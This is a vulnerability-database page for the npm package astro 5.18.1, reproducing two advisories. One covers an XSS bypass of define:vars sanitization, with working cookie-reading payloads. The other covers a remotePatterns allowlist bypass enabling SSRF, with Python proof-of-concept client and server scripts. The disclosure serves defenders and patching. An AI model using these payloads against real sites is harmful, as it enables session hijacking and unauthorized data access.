VulnerableCode Package Details - pkg:npm/astro@5.18.1

Staging Environment: Content and features may be unstable or change without notice.

Search for packages

Package details: pkg:npm/astro@5.18.1

Essentials
History (3)

purl	pkg:npm/astro@5.18.1

Next non-vulnerable version	6.1.6
Latest non-vulnerable version	6.1.10
Risk

Vulnerabilities affecting this package (1)

Vulnerability	Summary	Fixed by
VCID-a19r-4mhu-syhd Aliases: CVE-2026-41067 GHSA-j687-52p2-xcff	Astro: XSS in define:vars via incomplete </script> tag sanitization ## Summary The `defineScriptVars` function in Astro's server-side rendering pipeline uses a case-sensitive regex `/<\/script>/g` to sanitize values injected into inline `<script>` tags via the `define:vars` directive. HTML parsers close `<script>` elements case-insensitively and also accept whitespace or `/` before the closing `>`, allowing an attacker to bypass the sanitization with payloads like `</Script>`, `</script >`, or `</script/>` and inject arbitrary HTML/JavaScript. ## Details The vulnerable function is `defineScriptVars` at `packages/astro/src/runtime/server/render/util.ts:42-53`: ```typescript export function defineScriptVars(vars: Record<any, any>) { let output = ''; for (const [key, value] of Object.entries(vars)) { output += `const ${toIdent(key)} = ${JSON.stringify(value)?.replace( /<\/script>/g, // ← Case-sensitive, exact match only '\\x3C/script>', )};\n`; } return markHTMLString(output); } ``` This function is called from `renderElement` at `util.ts:172-174` when a `<script>` element has `define:vars`: ```typescript if (name === 'script') { delete props.hoist; children = defineScriptVars(defineVars) + '\n' + children; } ``` The regex `/<\/script>/g` fails to match three classes of closing script tags that HTML parsers accept per the [HTML specification §13.2.6.4](https://html.spec.whatwg.org/multipage/parsing.html#parsing-main-inbody): 1. Case variations: `</Script>`, `</SCRIPT>`, `</sCrIpT>` — HTML tag names are case-insensitive but the regex has no `i` flag. 2. Whitespace before `>`: `</script >`, `</script\t>`, `</script\n>` — after the tag name, the HTML tokenizer enters the "before attribute name" state on ASCII whitespace. 3. Self-closing slash: `</script/>` — the tokenizer enters "self-closing start tag" state on `/`. `JSON.stringify()` does not escape `<`, `>`, or `/` characters, so all these payloads pass through serialization unchanged. Execution flow: User-controlled input (e.g., `Astro.url.searchParams`) → assigned to a variable → passed via `define:vars` on a `<script>` tag → `renderElement` → `defineScriptVars` → incomplete sanitization → injected into `<script>` block in HTML response → browser closes the script element early → attacker-controlled HTML parsed and executed. ## PoC Step 1: Create an SSR Astro page (`src/pages/index.astro`): ```astro --- const name = Astro.url.searchParams.get('name') \|\| 'World'; --- <html> <body> <h1>Hello</h1> <script define:vars={{ name }}> console.log(name); </script> </body> </html> ``` Step 2: Ensure SSR is enabled in `astro.config.mjs`: ```js export default defineConfig({ output: 'server' }); ``` Step 3: Start the dev server and visit: ``` http://localhost:4321/?name=</Script><img/src=x%20onerror=alert(document.cookie)> ``` Step 4: View the HTML source. The output contains: ```html <script>const name = "</Script><img/src=x onerror=alert(document.cookie)>"; console.log(name); </script> ``` The browser's HTML parser matches `</Script>` case-insensitively, closing the script block. The `<img onerror=alert(document.cookie)>` is then parsed as HTML and the JavaScript in `onerror` executes. Alternative bypass payloads: ``` /?name=</script ><img/src=x onerror=alert(1)> /?name=</script/><img/src=x onerror=alert(1)> /?name=</SCRIPT><img/src=x onerror=alert(1)> ``` ## Impact An attacker can execute arbitrary JavaScript in the context of a victim's browser session on any SSR Astro application that passes request-derived data to `define:vars` on a `<script>` tag. This is a documented and expected usage pattern in Astro. Exploitation enables: - Session hijacking via cookie theft (`document.cookie`) - Credential theft by injecting fake login forms or keyloggers - Defacement of the rendered page - Redirection to attacker-controlled domains The vulnerability affects all Astro versions that support `define:vars` and is exploitable in any SSR deployment where user input reaches a `define:vars` script variable. ## Recommended Fix Replace the case-sensitive exact-match regex with a comprehensive escape that covers all HTML parser edge cases. The simplest correct fix is to escape all `<` characters in the JSON output: ```typescript export function defineScriptVars(vars: Record<any, any>) { let output = ''; for (const [key, value] of Object.entries(vars)) { output += `const ${toIdent(key)} = ${JSON.stringify(value)?.replace( /</g, '\\u003c', )};\n`; } return markHTMLString(output); } ``` This is the standard approach used by frameworks like Next.js and Rails. Replacing every `<` with `\u003c` is safe inside JSON string contexts (JavaScript treats `\u003c` as `<` at runtime) and eliminates all possible `</script>` variants including case variations, whitespace, and self-closing forms.	6.1.6 Affected by 0 other vulnerabilities.

Vulnerabilities fixed by this package (1)

Vulnerability	Summary	Aliases
VCID-jcqr-tk29-xbat	Astro: Remote allowlist bypass via unanchored matchPathname wildcard ## Summary This issue concerns Astro's `remotePatterns` path enforcement for remote URLs used by server-side fetchers such as the image optimization endpoint. The path matching logic for `/` wildcards is unanchored, so a pathname that contains the allowed prefix later in the path can still match. As a result, an attacker can fetch paths outside the intended allowlisted prefix on an otherwise allowed host. In our PoC, both the allowed path and a bypass path returned 200 with the same SVG payload, confirming the bypass. ## Impact Attackers can fetch unintended remote resources on an allowlisted host via the image endpoint, expanding SSRF/data exposure beyond the configured path prefix. ## Description Taint flow: request -> `transform.src` -> `isRemoteAllowed()` -> `matchPattern()` -> `matchPathname()` User-controlled `href` is parsed into `transform.src` and validated via `isRemoteAllowed()`: Source: https://github.com/withastro/astro/blob/e0f1a2b3e4bc908bd5e148c698efb6f41a42c8ea/packages/astro/src/assets/endpoint/generic.ts#L43-L56 ```ts const url = new URL(request.url); const transform = await imageService.parseURL(url, imageConfig); const isRemoteImage = isRemotePath(transform.src); if (isRemoteImage && isRemoteAllowed(transform.src, imageConfig) === false) { return new Response('Forbidden', { status: 403 }); } ``` `isRemoteAllowed()` checks each `remotePattern` via `matchPattern()`: Source: https://github.com/withastro/astro/blob/e0f1a2b3e4bc908bd5e148c698efb6f41a42c8ea/packages/internal-helpers/src/remote.ts#L15-L21 ```ts export function matchPattern(url: URL, remotePattern: RemotePattern): boolean { return ( matchProtocol(url, remotePattern.protocol) && matchHostname(url, remotePattern.hostname, true) && matchPort(url, remotePattern.port) && matchPathname(url, remotePattern.pathname, true) ); } ``` The vulnerable logic in `matchPathname()` uses `replace()` without anchoring the prefix for `/` patterns: Source: https://github.com/withastro/astro/blob/e0f1a2b3e4bc908bd5e148c698efb6f41a42c8ea/packages/internal-helpers/src/remote.ts#L85-L99 ```ts } else if (pathname.endsWith('/')) { const slicedPathname = pathname.slice(0, -1); // length const additionalPathChunks = url.pathname .replace(slicedPathname, '') .split('/') .filter(Boolean); return additionalPathChunks.length === 1; } ``` Vulnerable code flow: 1. `isRemoteAllowed()` evaluates `remotePatterns` for a requested URL. 2. `matchPathname()` handles `pathname: "/img/"` using `.replace()` on the URL path. 3. A path such as `/evil/img/secret` incorrectly matches because `/img/` is removed even when it's not at the start. 4. The image endpoint fetches and returns the remote resource. ## PoC The PoC starts a local attacker server and configures remotePatterns to allow only `/img/`. It then requests the image endpoint with two URLs: an allowed path and a bypass path with `/img/` in the middle. Both requests returned the SVG payload, showing the path restriction was bypassed. ### Vulnerable config ```js import { defineConfig } from 'astro/config'; import node from '@astrojs/node'; export default defineConfig({ output: 'server', adapter: node({ mode: 'standalone' }), image: { remotePatterns: [ { protocol: 'https', hostname: 'cdn.example', pathname: '/img/' }, { protocol: 'http', hostname: '127.0.0.1', port: '9999', pathname: '/img/' }, ], }, }); ``` ### Affected pages This PoC targets the `/_image` endpoint directly; no additional pages are required. ### PoC Code ```python import http.client import json import urllib.parse HOST = "127.0.0.1" PORT = 4321 def fetch(path: str) -> dict: conn = http.client.HTTPConnection(HOST, PORT, timeout=10) conn.request("GET", path, headers={"Host": f"{HOST}:{PORT}"}) resp = conn.getresponse() body = resp.read(2000).decode("utf-8", errors="replace") conn.close() return { "path": path, "status": resp.status, "reason": resp.reason, "headers": dict(resp.getheaders()), "body_snippet": body[:400], } allowed = urllib.parse.quote("http://127.0.0.1:9999/img/allowed.svg", safe="") bypass = urllib.parse.quote("http://127.0.0.1:9999/evil/img/secret.svg", safe="") # Both pass, second should fail results = { "allowed": fetch(f"/_image?href={allowed}&f=svg"), "bypass": fetch(f"/_image?href={bypass}&f=svg"), } print(json.dumps(results, indent=2)) ``` ### Attacker server ```python from http.server import BaseHTTPRequestHandler, HTTPServer HOST = "127.0.0.1" PORT = 9999 PAYLOAD = """<svg xmlns=\"http://www.w3.org/2000/svg\"> <text>OK</text> </svg> """ class Handler(BaseHTTPRequestHandler): def do_GET(self): print(f">>> {self.command} {self.path}") if self.path.endswith(".svg") or "/img/" in self.path: self.send_response(200) self.send_header("Content-Type", "image/svg+xml") self.send_header("Cache-Control", "no-store") self.end_headers() self.wfile.write(PAYLOAD.encode("utf-8")) return self.send_response(200) self.send_header("Content-Type", "text/plain") self.end_headers() self.wfile.write(b"ok") def log_message(self, format, *args): return if __name__ == "__main__": server = HTTPServer((HOST, PORT), Handler) print(f"HTTP logger listening on http://{HOST}:{PORT}") server.serve_forever() ``` ### PoC Steps 1. Bootstrap default Astro project. 2. Add the vulnerable config and attacker server. 3. Build the project. 4. Start the attacker server. 5. Start the Astro server. 6. Run the PoC. 7. Observe the console output showing both the allowed and bypass requests returning the SVG payload.	CVE-2026-33769 GHSA-g735-7g2w-hh3f

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2026-06-06T08:14:21.198234+00:00	GitLab Importer	Affected by	VCID-a19r-4mhu-syhd	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/astro/CVE-2026-41067.yml	38.6.0
2026-06-06T07:35:08.090407+00:00	GitLab Importer	Fixing	VCID-jcqr-tk29-xbat	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/astro/CVE-2026-33769.yml	38.6.0
2026-06-04T16:59:50.159175+00:00	GithubOSV Importer	Fixing	VCID-jcqr-tk29-xbat	https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-g735-7g2w-hh3f/GHSA-g735-7g2w-hh3f.json	38.6.0